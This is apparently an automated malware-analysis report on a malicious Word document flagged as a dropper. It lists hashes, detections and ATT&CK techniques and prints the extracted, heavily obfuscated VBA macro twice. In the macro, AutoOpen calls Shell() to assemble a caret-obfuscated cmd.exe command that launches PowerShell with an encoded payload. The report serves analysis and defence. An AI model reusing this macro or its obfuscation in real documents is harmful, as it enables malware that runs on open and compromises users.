Office (OLE) malware analysis — malicious · e223e5bcca2e94d3

MALICIOUS

Office (OLE)

117.0 KB Created: 2018-06-05 04:42:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 40d344713ef16f4a3b386690607d9d6b SHA-1: 427df021e4bf9b7e3b3327a13eff1207e9ce0f67 SHA-256: e223e5bcca2e94d33abd28bf5375944b7c6b92035f3771cb8270d9efdb61d1c9

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a command. The script concatenates strings to form commands, including what appears to be a path to 'cmd.exe' and potentially a PowerShell execution command. This indicates the document is designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6574595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6574595-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12535 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12535 bytes
SHA-256: `4dd950232ee36c2d1acd6cbf156a6aaf843ce6118395e23373e8af3178529d9c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "IfhfpDUmuwzzzA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function OHkoN() On Error Resume Next wuMOk = Hex(BiwzMp + Hex(wGkZAw) * 74209 + Round(LjcDSn)) pVVEf = Cos(zvDIOO) OoTsNI = CDate(RdmUpM) lKjLS = Cos(vocdI) swKhQ = Hex(hEaWPk + Hex(JFpLjB) * 27236 + Round(YOkTz)) NmZMpk = Cos(QiGwV) IHsOuz = CDate(IvGct) upTkZN = Cos(qUSBK) OHkoN = KUvYdjF + Shell(fhQmV + Chr(EIzsLL + vbKeyC + IjwUJWRX) + aSBTlbphvKD + wjrXCqsQ + VhHLjrpH + uSwztR + QHjSUdlF + TwzviTll + GtFOjj, 97639 - 97639) zltWiP = Hex(TFMfz + Hex(UcnSjw) * 36809 + Round(qOwwh)) CroprE = Cos(zkPYX) iJodn = CDate(jsrDCl) rNJXw = Cos(BjMcR) End Function Sub Autoopen() On Error Resume Next ouVVr = Hex(tIjoD + Hex(kJMzq) * 21202 + Round(mDmNHp)) TAWjS = Cos(WGzrOX) fIcVCJ = CDate(mnMDq) ofSCh = Cos(fiEtl) OHkoN VWidJ = Hex(iSLId + Hex(QKwhaj) * 76698 + Round(qRsqo)) JAsUbP = Cos(ShmcId) UXpfCr = CDate(WPzDYF) MDiop = Cos(Lharj) End Sub Attribute VB_Name = "kwdLERCzw" Function aSBTlbphvKD() On Error Resume Next YREzkX = Hex(vRDZp + Hex(wFJKRL) * 635 + Round(VFOiRw)) VfcSEz = Cos(zqYbwZ) pkoWtC = CDate(puGRn) CLqQSY = Cos(ZmbHlC) jJTGjpjv = "md JN" + "sXYTk qTFmKR" + "niBkYWF" + "dWXd zIAt" + "up" + "ls" ITmqP = Hex(LfVZLY + Hex(HfkWBQ) * 16845 + Round(mzHIXl)) DJhlq = Cos(MWIQBN) XqQFtc = CDate(tBFGVt) WTihr = Cos(LbLsah) zpIlWSrP = "liid & " + "%^c^o^m^S^p" + "^E^c^%" + " %^c^o^m" vJcFzC = Hex(TvjCOv + Hex(GCEbP) * 94201 + Round(pCdjKY)) viYiM = Cos(lkYzGT) sakbS = CDate(lEZHRL) JFHzWp = Cos(OYRKYC) XVjtY = "^S" + "^p" + "^E^c^% " + " /V /" + "c " + "set %l" + "wulVj" + "Pqa" SWdEU = Hex(jvPSCR + Hex(nNVWH) * 36865 + Round(UjcZcR)) wUJZDP = Cos(ShvCwO) OpowF = CDate(rBCuDF) vltEcC = Cos(kaGsw) vBzzQVXc = "FYFdhv%=DkV" + "zvkmMqaLw&&set " + "%aHtuI" + "TldHPow%=p&&s" iUfaT = Hex(EZGqn + Hex(XqzwSO) * 43399 + Round(nkjnra)) HQojww = Cos(tWWca) ACpvFb = CDate(MKnIr) AOwnr = Cos(tRzIRG) XwhMbAYKnlb = "et %" + "dfVzrMrFqcAOj%" + "=o" + "^w" + "&&set %ZYBDXG" + "Sac" + "THpImI%=ju" iTzaap = Hex(izluli + Hex(Vjwdf) * 84526 + Round(wpujft)) bDtXoO = Cos(lPjNSD) CdDCJS = CDate(kAfmP) jiCrv = Cos(GCtsWz) clzWpR = "PNuEoBIii" + "AL&&set %jNKzwa" + "pr%=!%aHt" + "uITldHPow%!&&se" aSBTlbphvKD = jJTGjpjv + zpIlWSrP + XVjtY + vBzzQVXc + XwhMbAYKnlb + clzWpR End Function Function wjrXCqsQ() On Error Resume Next SjRMP = Hex(oivMr + Hex(WbJrDN) * 71189 + Round(wRHNs)) WzoIk = Cos(EpzoSn) aaikS = CDate(KZVwL) flYXBc = Cos(Uzqqt) qnKqI = "t %hvvV" + "SQB" + "DUiXOUEj%=jqIcu" + "cvKzB" + "V&&set %hiw" + "OOjQfiL%=e^r" + "&&set %BzCtblza" + "nvz%=!%dfVz" + "rMrFqcAOj%!&" bKchbV = Hex(PzKwN + Hex(pCisAB) * 55972 + Round(FvjRz)) OTRkk = Cos(zqBisu) nahaZJ = CDate(mBmFp) QUVOvP = Cos(JJwfaO) zKnTuzknjZG = "&s" + "et %dCrJQmIii" + "%=s&&s" + "et %kAvsXSOuY" + "LUqWHo%=Mswaz" iwAzA = Hex(aprYU + Hex(HcZMj) * 24519 + Round(uYcVmm)) QRddCA = Cos(lmnBm) iPadz = CDate(oHBkwQ) jTzGd = Cos(NXqJM) aQqoZJj = "FXco&" + "&set %ikXdRG" + "djit" + "%=he" + "&&set %Yz" + "Ez" + "JAaPZzA%=ll&&!%" + "jNKzwapr%!!%" VUvWp = Hex(LuIMfw + Hex(XrzVPj) * 62989 + Round(jUslj)) mYjsG = Cos(Pbatk) wkVKT = CDate(BGGWPC) cfzmAD = Cos(JcZVbU) HAHbSupOvRc = "BzCtblz" + "anvz%!!%hi" + "wOOjQfiL%" + "!!%dCrJQ" + "mIii%!!%ikXdRGd" + "jit%" + "!!%YzEzJA" + "aP" + "ZzA%! -e KAB" + "uAEUAdwAtAE8" jjvRE = Hex(DivsZA + Hex(jZDQI) * 58223 + Round(diQpa)) zBWLAj = Cos(ORXKEL) XujHM = CDate(zBkYJM) DvATGr = Cos(lBLkr) cDGEjZim = "AYgBKAEUA" + "Yw" + "B0AC" + "AAIABpAE8AL" + "gBjAE8ATQBQA" + "HI" + "AZQBTAHMAa" + "QBPAE4" + "ALgBEAGUARg" ApSCsL = Hex(MsjzIc + Hex(qwRzCn) * 73628 + Round(TRDENw)) VizPXz = Cos(jhfzP) KMBLdR = CDate(mkOhE) EWAwo = Cos(AfXBzs) tAThjT = "BsAEEA" + "dABlAFMAdA" + "ByAEUAQQBNAC" + "gAIABb" + "AEkATwAuAE" ahPjR = Hex(YBlHP + Hex(avYulU) * 33691 + Round ... (truncated)

SHA-256: 4dd950232ee36c2d1acd6cbf156a6aaf843ce6118395e23373e8af3178529d9c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "IfhfpDUmuwzzzA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OHkoN()
On Error Resume Next
wuMOk = Hex(BiwzMp + Hex(wGkZAw) * 74209 + Round(LjcDSn))
pVVEf = Cos(zvDIOO)
OoTsNI = CDate(RdmUpM)
lKjLS = Cos(vocdI)
swKhQ = Hex(hEaWPk + Hex(JFpLjB) * 27236 + Round(YOkTz))
NmZMpk = Cos(QiGwV)
IHsOuz = CDate(IvGct)
upTkZN = Cos(qUSBK)
OHkoN = KUvYdjF + Shell(fhQmV + Chr(EIzsLL + vbKeyC + IjwUJWRX) + aSBTlbphvKD + wjrXCqsQ + VhHLjrpH + uSwztR + QHjSUdlF + TwzviTll + GtFOjj, 97639 - 97639)
zltWiP = Hex(TFMfz + Hex(UcnSjw) * 36809 + Round(qOwwh))
CroprE = Cos(zkPYX)
iJodn = CDate(jsrDCl)
rNJXw = Cos(BjMcR)
End Function
Sub Autoopen()
On Error Resume Next
ouVVr = Hex(tIjoD + Hex(kJMzq) * 21202 + Round(mDmNHp))
TAWjS = Cos(WGzrOX)
fIcVCJ = CDate(mnMDq)
ofSCh = Cos(fiEtl)
OHkoN
VWidJ = Hex(iSLId + Hex(QKwhaj) * 76698 + Round(qRsqo))
JAsUbP = Cos(ShmcId)
UXpfCr = CDate(WPzDYF)
MDiop = Cos(Lharj)
End Sub


Attribute VB_Name = "kwdLERCzw"
Function aSBTlbphvKD()
On Error Resume Next
YREzkX = Hex(vRDZp + Hex(wFJKRL) * 635 + Round(VFOiRw))
VfcSEz = Cos(zqYbwZ)
pkoWtC = CDate(puGRn)
CLqQSY = Cos(ZmbHlC)
jJTGjpjv = "md JN" + "sXYTk qTFmKR" + "niBkYWF" + "dWXd zIAt" + "up" + "ls"
ITmqP = Hex(LfVZLY + Hex(HfkWBQ) * 16845 + Round(mzHIXl))
DJhlq = Cos(MWIQBN)
XqQFtc = CDate(tBFGVt)
WTihr = Cos(LbLsah)
zpIlWSrP = "liid &     " + "%^c^o^m^S^p" + "^E^c^%" + "     %^c^o^m"
vJcFzC = Hex(TvjCOv + Hex(GCEbP) * 94201 + Round(pCdjKY))
viYiM = Cos(lkYzGT)
sakbS = CDate(lEZHRL)
JFHzWp = Cos(OYRKYC)
XVjtY = "^S" + "^p" + "^E^c^%    " + " /V         /" + "c           " + "set %l" + "wulVj" + "Pqa"
SWdEU = Hex(jvPSCR + Hex(nNVWH) * 36865 + Round(UjcZcR))
wUJZDP = Cos(ShvCwO)
OpowF = CDate(rBCuDF)
vltEcC = Cos(kaGsw)
vBzzQVXc = "FYFdhv%=DkV" + "zvkmMqaLw&&set " + "%aHtuI" + "TldHPow%=p&&s"
iUfaT = Hex(EZGqn + Hex(XqzwSO) * 43399 + Round(nkjnra))
HQojww = Cos(tWWca)
ACpvFb = CDate(MKnIr)
AOwnr = Cos(tRzIRG)
XwhMbAYKnlb = "et %" + "dfVzrMrFqcAOj%" + "=o" + "^w" + "&&set %ZYBDXG" + "Sac" + "THpImI%=ju"
iTzaap = Hex(izluli + Hex(Vjwdf) * 84526 + Round(wpujft))
bDtXoO = Cos(lPjNSD)
CdDCJS = CDate(kAfmP)
jiCrv = Cos(GCtsWz)
clzWpR = "PNuEoBIii" + "AL&&set %jNKzwa" + "pr%=!%aHt" + "uITldHPow%!&&se"
aSBTlbphvKD = jJTGjpjv + zpIlWSrP + XVjtY + vBzzQVXc + XwhMbAYKnlb + clzWpR
End Function
Function wjrXCqsQ()
On Error Resume Next
SjRMP = Hex(oivMr + Hex(WbJrDN) * 71189 + Round(wRHNs))
WzoIk = Cos(EpzoSn)
aaikS = CDate(KZVwL)
flYXBc = Cos(Uzqqt)
qnKqI = "t %hvvV" + "SQB" + "DUiXOUEj%=jqIcu" + "cvKzB" + "V&&set %hiw" + "OOjQfiL%=e^r" + "&&set %BzCtblza" + "nvz%=!%dfVz" + "rMrFqcAOj%!&"
bKchbV = Hex(PzKwN + Hex(pCisAB) * 55972 + Round(FvjRz))
OTRkk = Cos(zqBisu)
nahaZJ = CDate(mBmFp)
QUVOvP = Cos(JJwfaO)
zKnTuzknjZG = "&s" + "et %dCrJQmIii" + "%=s&&s" + "et %kAvsXSOuY" + "LUqWHo%=Mswaz"
iwAzA = Hex(aprYU + Hex(HcZMj) * 24519 + Round(uYcVmm))
QRddCA = Cos(lmnBm)
iPadz = CDate(oHBkwQ)
jTzGd = Cos(NXqJM)
aQqoZJj = "FXco&" + "&set %ikXdRG" + "djit" + "%=he" + "&&set %Yz" + "Ez" + "JAaPZzA%=ll&&!%" + "jNKzwapr%!!%"
VUvWp = Hex(LuIMfw + Hex(XrzVPj) * 62989 + Round(jUslj))
mYjsG = Cos(Pbatk)
wkVKT = CDate(BGGWPC)
cfzmAD = Cos(JcZVbU)
HAHbSupOvRc = "BzCtblz" + "anvz%!!%hi" + "wOOjQfiL%" + "!!%dCrJQ" + "mIii%!!%ikXdRGd" + "jit%" + "!!%YzEzJA" + "aP" + "ZzA%!  -e KAB" + "uAEUAdwAtAE8"
jjvRE = Hex(DivsZA + Hex(jZDQI) * 58223 + Round(diQpa))
zBWLAj = Cos(ORXKEL)
XujHM = CDate(zBkYJM)
DvATGr = Cos(lBLkr)
cDGEjZim = "AYgBKAEUA" + "Yw" + "B0AC" + "AAIABpAE8AL" + "gBjAE8ATQBQA" + "HI" + "AZQBTAHMAa" + "QBPAE4" + "ALgBEAGUARg"
ApSCsL = Hex(MsjzIc + Hex(qwRzCn) * 73628 + Round(TRDENw))
VizPXz = Cos(jhfzP)
KMBLdR = CDate(mkOhE)
EWAwo = Cos(AfXBzs)
tAThjT = "BsAEEA" + "dABlAFMAdA" + "ByAEUAQQBNAC" + "gAIABb" + "AEkATwAuAE"
ahPjR = Hex(YBlHP + Hex(avYulU) * 33691 + Round
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.